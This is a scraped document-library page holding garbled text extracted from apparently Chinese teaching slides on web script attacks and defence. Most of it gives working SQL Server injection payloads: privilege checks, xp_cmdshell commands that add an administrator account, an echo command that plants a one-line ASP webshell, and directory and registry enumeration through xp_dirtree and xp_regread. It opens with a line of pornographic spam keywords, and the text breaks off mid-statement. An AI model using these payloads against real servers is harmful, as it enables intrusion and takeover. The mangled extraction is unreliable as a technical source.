freepeople性欧美熟妇, 色戒完整版无删减158分钟hd, 无码精品国产vα在线观看DVD, 丰满少妇伦精品无码专区在线观看,艾栗栗与纹身男宾馆3p50分钟,国产AV片在线观看,黑人与美女高潮,18岁女RAPPERDISSSUBS,国产手机在机看影片

正文內(nèi)容

網(wǎng)絡(luò)腳本攻擊與防御ppt-文庫(kù)吧

2025-11-09 11:50 本頁(yè)面


【正文】 c_Post)),Tc_Inf(Tc_Xh))0 Then Script Language=JavaScriptalert(39。請(qǐng)不要在參數(shù)中包含非法字符嘗試注入! 39。)。/Script 39。處理 get數(shù)據(jù) If Then For Each Tc_Get In For Tc_Xh=0 To Ubound(Tc_Inf) If Instr(LCase((Tc_Get)),Tc_Inf(Tc_Xh))0 Then Script Language=JavaScriptalert(39。請(qǐng)不要在參數(shù)中包含非法字符嘗試注入! 39。)。/Script SQLServer數(shù)據(jù)庫(kù)的注入 ? 判斷帳號(hào)的權(quán)限 ?帳戶有三種不同的權(quán)限: Sa權(quán)限、 Db_owner權(quán)限、Public權(quán)限 ? 。and (select count(*) from sysobjects)0 and 1=(select IS_SRVROLEMEMBER(?sysadmin?)) 。 如果返回正常的話就說(shuō)明數(shù)據(jù)庫(kù)連接帳戶是 Sa權(quán)限 ? and 1=(select IS_MEMBER(39。db_owner39。)) 。 如果返回正常的話就說(shuō)明數(shù)據(jù)庫(kù)連接帳戶就是db_owner權(quán)限 Sa權(quán)限下的注入 ? Web和數(shù)據(jù)庫(kù)在一臺(tái)服務(wù)器上 在這種情況下又可以分為幾種情況: 1. 沒(méi)有防火墻阻隔直接拿系統(tǒng)權(quán)限 。exec 39。 user helen 123456 /add39。 。exec 39。 localgroup administrators helen /add39。 2. 無(wú)法直接連接服務(wù)器 取得 webshell。 什么是 webshell? 所謂 webshell就是一個(gè) asp或 php木馬后門,黑客在入侵了一個(gè)網(wǎng)站后,常常在將這些 asp或php木馬后門文件放置在網(wǎng)站服務(wù)器的 web目錄中,與正常的網(wǎng)頁(yè)文件混在一起。然后黑客就可以用 web的方式,通過(guò) asp或 php木馬后門控制網(wǎng)站服務(wù)器,包括上傳下載文件、查看數(shù)據(jù)庫(kù)、執(zhí)行任意程序命令等。 webshell的優(yōu)點(diǎn) webshell 最大的優(yōu)點(diǎn)就是可以穿越防火墻,由于與被控制的服務(wù)器或遠(yuǎn)程主機(jī)交換的數(shù)據(jù)都是通過(guò) 80端口傳遞的,因此不會(huì)被防火墻攔截。并且使用 webshell一般不會(huì)在系統(tǒng)日志中留下記錄,只會(huì)在網(wǎng)站的 web日志中留下一些數(shù)據(jù)提交記錄,沒(méi)有經(jīng)驗(yàn)的管理員是很難看出入侵痕跡的。 如何利用 Sa權(quán)限取得 webshell? ? 可以利用對(duì) Access數(shù)據(jù)庫(kù)注入的方法,猜解管理員帳戶密碼,登陸后臺(tái)再通過(guò)上傳或者寫(xiě)入配置文件等方法得到 webshell,如前介紹。 ? 找到 web目錄直接用 echo命令寫(xiě)入簡(jiǎn)單的 asp木馬。找 web目錄現(xiàn)在一般有讀取注冊(cè)表和遍歷目錄法,寫(xiě)入木馬是利用 xp_cmdshell擴(kuò)展存儲(chǔ)執(zhí)行命令。假如 web目錄為 D:\WEB,具體語(yǔ)句如下: 。exec ?echo ^^%eval request(chr(35))%^^ D:\WEB\?。 一句話木馬 ? Web服務(wù)器和數(shù)據(jù)庫(kù)服務(wù)器分離 首先 ,想辦法得到數(shù)據(jù)庫(kù)服務(wù)器的 ip地址 ,使用xp_cmdshell擴(kuò)展存儲(chǔ)執(zhí)行命令,具體如下: 方法一: 。exec 39。ipconfig all39。 此方法用在可以得到命令回顯的情況下,用ipconfig命令得到 ip地址 方法二: 。exec 39。ping 你的 IP? 使用此方法時(shí)先打開(kāi)防火墻的禁止 ping入功能,執(zhí)行命令后防火墻就會(huì)提示某 ip地址禁止 ping入,那就是數(shù)據(jù)庫(kù)服務(wù)器的 ip地址。 其次 ,處理方法與“ Web和數(shù)據(jù)庫(kù)在一臺(tái)服務(wù)器”情況相同。 db_owner權(quán)限下的注入 直接獲取 webshell的方法: WEB路徑 在 db_owner權(quán)限下要得到 WEB路徑基本只有兩個(gè)辦法: ? 利用擴(kuò)展存儲(chǔ)過(guò)程 xp_regread,只要有 Public權(quán)限就可以運(yùn)行它。因?yàn)?IIS默認(rèn)的 WEB路徑放在注冊(cè)表中,所以通過(guò)以下語(yǔ)句就可以讀取出來(lái): 。Exec HKEY_LOCAL_MACHINE, ?SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\?, ?/? ? 利用擴(kuò)展存儲(chǔ)過(guò)程 xp_dirtree。通過(guò)它可以列出指定目錄下所有的子目錄和文件。這個(gè)擴(kuò)展存儲(chǔ)過(guò)程同樣只需要 Public權(quán)限就可以運(yùn)行它,它有三個(gè)參數(shù),第一個(gè)參數(shù)是路徑,第二個(gè)是目錄深度,第三個(gè)表示是否列出文件。如果第三個(gè)參數(shù)為 0,那么只列出目錄。 方法一: ? 首先建立一個(gè)臨時(shí)表把目標(biāo)盤下面的 1級(jí)子目錄和文件插入到表中: 。CREATE TABLE tmp([ID] int IDENTITY (1,1) NOT NULL,[name] [nvarchar] (300) NOT NULL,[depth] [int] NOT NULL,[isfile] [nvarchar] (50) NULL)。insert into tmp exec master..xp_dirtree ?d:\?,1,1 ? 獲取第一條數(shù)據(jù): and (select name from tmp where id=1)1 ? 這樣通過(guò)遞增 ID就可以把所有目錄讀取出來(lái),一定可以找出 web目錄。 方法二: ? 第一步還是先創(chuàng)建臨時(shí)表,把目標(biāo)盤下面的所有子目錄和文件信息全部插入到表中: TABLE tmp([ID] int IDENTITY (1,1) NOT NULL,[name] [nvarchar] (300) NOT NULL,[depth] [int] NOT NULL,[isfile] [nvarchar] (50) NULL)。insert into tmp exec maste
點(diǎn)擊復(fù)制文檔內(nèi)容
教學(xué)課件相關(guān)推薦
文庫(kù)吧 www.dybbs8.com
備案圖鄂ICP備17016276號(hào)-1